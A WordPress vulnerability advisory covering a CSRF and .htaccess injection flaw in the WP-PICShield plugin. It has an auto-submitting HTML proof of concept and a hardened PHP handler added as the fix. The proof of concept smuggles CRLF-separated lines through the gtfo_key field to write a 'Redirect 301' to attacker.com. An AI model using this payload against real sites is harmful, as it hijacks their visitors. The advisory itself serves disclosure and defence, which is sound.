ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)



Description
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF.

When the plugin options are updated, several parameters from the POST request are written directly to the .htaccess file in the WordPress root directory. Since this request is not protected against CSRF and the values are written without sanitizing line breaks, an attacker may be able to insert arbitrary lines into .htaccess, for example reconfiguring it to redirect visitors to another website or to perform other malicious actions.

While all plugin options can be updated by an attacker via CSRF, the following parameter values are directly inserted into .htaccess:
byhln[gtfo_key]
byhln[images_extension]
byhln[allowed_domains]
byhln[allowed_user_agents]
byhln[allowed_remote_ip]

The attached PoC demonstrates a CSRF payload that rewrites the victim's .htaccess file to redirect to an attacker-controlled website; the injected byhln[gtfo_key] value contains CRLF-separated lines.
Proof of Concept
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://target.com/wordpress/wp-admin/options-general.php?page=byrev_picshield_admin" method="POST">
      <input type="hidden" name="byhln&#95;hidden" value="Y" />
      <input type="hidden" name="byhln&#91;wp&#45;picshield&#45;version&#93;" value="1&#46;9&#46;7" />
      <input type="hidden" name="byhln&#91;enable&#95;hotlink&#95;gtfo&#93;" value="1" />
      <input type="hidden" name="byhln&#91;gtfo&#95;key&#93;" value="csrf&#13;&#10;Redirect&#32;301&#32;&#47;&#32;http&#58;&#47;&#47;attacker&#46;com&#47;&#13;&#10;&#35;" />
      <input type="hidden" name="byhln&#91;hotlink&#95;cache&#95;folder&#93;" value="&#126;hotlink&#45;cache" />
      <input type="hidden" name="byhln&#91;image&#95;source&#95;transparency&#93;" value="65" />
      <input type="hidden" name="byhln&#91;watermark&#95;enabled&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;pass&#95;through&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;png&#95;file&#93;" value="watermark&#46;png" />
      <input type="hidden" name="byhln&#91;watermark&#95;position&#93;" value="0" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;watermark&#93;" value="1" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;opacity&#93;" value="25" />
      <input type="hidden" name="byhln&#91;write&#95;host&#95;source&#93;" value="1" />
      <input type="hidden" name="byhln&#91;write&#95;time&#95;cached&#95;over&#95;image&#93;" value="0" />
      <input type="hidden" name="byhln&#91;print&#95;qr&#95;host&#93;" value="0" />
      <input type="hidden" name="byhln&#91;send&#95;hotlink&#95;gtfo&#95;header&#95;signature&#93;" value="0" />
      <input type="hidden" name="byhln&#91;redirect&#95;direct&#95;link&#95;images&#95;from&#95;google&#93;" value="1" />
      <input type="hidden" name="byhln&#91;redirect&#95;404&#95;not&#95;found&#95;image&#93;" value="&#47;image&#45;not&#45;found&#47;" />
      <input type="hidden" name="byhln&#91;redirect&#95;not&#95;found&#95;image&#95;code&#93;" value="404&#32;Not&#32;Found" />
      <input type="hidden" name="byhln&#91;maximum&#95;megapixels&#95;size&#93;" value="3" />
      <input type="hidden" name="byhln&#91;images&#95;extension&#93;" value="jpg&#32;jpeg&#32;png&#32;gif" />
      <input type="hidden" name="byhln&#91;allowed&#95;domains&#93;" value="www&#46;zjulian&#46;com" />
      <input type="hidden" name="byhln&#91;allowed&#95;user&#95;agents&#93;" value="googlebot&#13;&#10;msnbot&#13;&#10;baiduspider&#13;&#10;slurp&#13;&#10;webcrawler&#13;&#10;teoma&#13;&#10;photon" />
      <input type="hidden" name="byhln&#91;allowed&#95;remote&#95;ip&#93;" value="" />
      <input type="hidden" name="byhln&#91;allow&#95;online&#95;translators&#93;" value="1" />
      <input type="hidden" name="byhln&#91;allow&#95;socials&#93;" value="1" />
      <input type="hidden" name="byhln&#91;x&#95;frame&#95;sameorgin&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;enabled&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;table&#93;" value="&#42;&#42;&#32;disabled&#32;&#42;&#42;" />
      <input type="hidden" name="byhln&#91;write&#95;credit&#95;plugin&#93;" value="1" />
      <input type="hidden" name="Submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
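A hardened version of the options handler the description refers to, added here as an example and not the plugin's own code. It assumes a nonce action name 'byhln_update_options', an option key 'byhln_options' and a conservative character whitelist, all of which are illustrative. The two defects are fixed separately: the nonce check stops a cross-site request from reaching the handler at all, and per-line sanitization ensures that even an authenticated submission cannot smuggle CRLF-separated directives into .htaccess.

```php
<?php
// Added example (not the plugin's code): a hardened options handler.
// Assumptions, all illustrative: nonce action 'byhln_update_options',
// option key 'byhln_options', and a conservative character whitelist.

// Reduce one submitted value to a single safe line. sanitize_text_field()
// already removes CR/LF, so "csrf\r\nRedirect 301 / http://..." collapses to
// one line and can no longer start a new .htaccess directive.
function byhln_example_sanitize_line( $value ) {
    $value = is_string( $value ) ? wp_unslash( $value ) : '';
    $value = sanitize_text_field( $value );
    // Whitelist rather than blacklist: keep only characters these options need.
    return preg_replace( '/[^A-Za-z0-9 ._\-]/', '', $value );
}

// Multi-line options (allowed_domains, allowed_user_agents, allowed_remote_ip)
// are validated entry by entry instead of being written to .htaccess verbatim.
function byhln_example_sanitize_list( $value ) {
    $value = is_string( $value ) ? wp_unslash( $value ) : '';
    $clean = array();
    foreach ( preg_split( '/\R/', $value ) as $line ) {
        $line = byhln_example_sanitize_line( $line );
        if ( '' !== $line ) {
            $clean[] = $line;
        }
    }
    return $clean;
}

function byhln_example_handle_options_post() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // CSRF fix: the settings form must emit wp_nonce_field( 'byhln_update_options' );
    // a cross-site form cannot know the nonce, so check_admin_referer() dies here.
    check_admin_referer( 'byhln_update_options' );
    $in = ( isset( $_POST['byhln'] ) && is_array( $_POST['byhln'] ) ) ? $_POST['byhln'] : array();
    $opts = array(
        'gtfo_key'            => byhln_example_sanitize_line( $in['gtfo_key'] ?? '' ),
        'images_extension'    => byhln_example_sanitize_line( $in['images_extension'] ?? '' ),
        'allowed_domains'     => byhln_example_sanitize_list( $in['allowed_domains'] ?? '' ),
        'allowed_user_agents' => byhln_example_sanitize_list( $in['allowed_user_agents'] ?? '' ),
        // Remote IPs additionally have to parse as IP addresses.
        'allowed_remote_ip'   => array_values( array_filter(
            byhln_example_sanitize_list( $in['allowed_remote_ip'] ?? '' ),
            function ( $ip ) { return false !== filter_var( $ip, FILTER_VALIDATE_IP ); }
        ) ),
    );
    update_option( 'byhln_options', $opts );
    // The .htaccess writer should then be fed only $opts, one validated value per line.
}
```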

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Submitter Zachary Julian
Submitter Website http://www.zjulian.com/
Submitter Twitter @tprime_
Verified No
WPVDB ID 8738

Timeline

Publicly Published 2017-01-04
Added 2017-02-22
Last Updated 2019-08-05
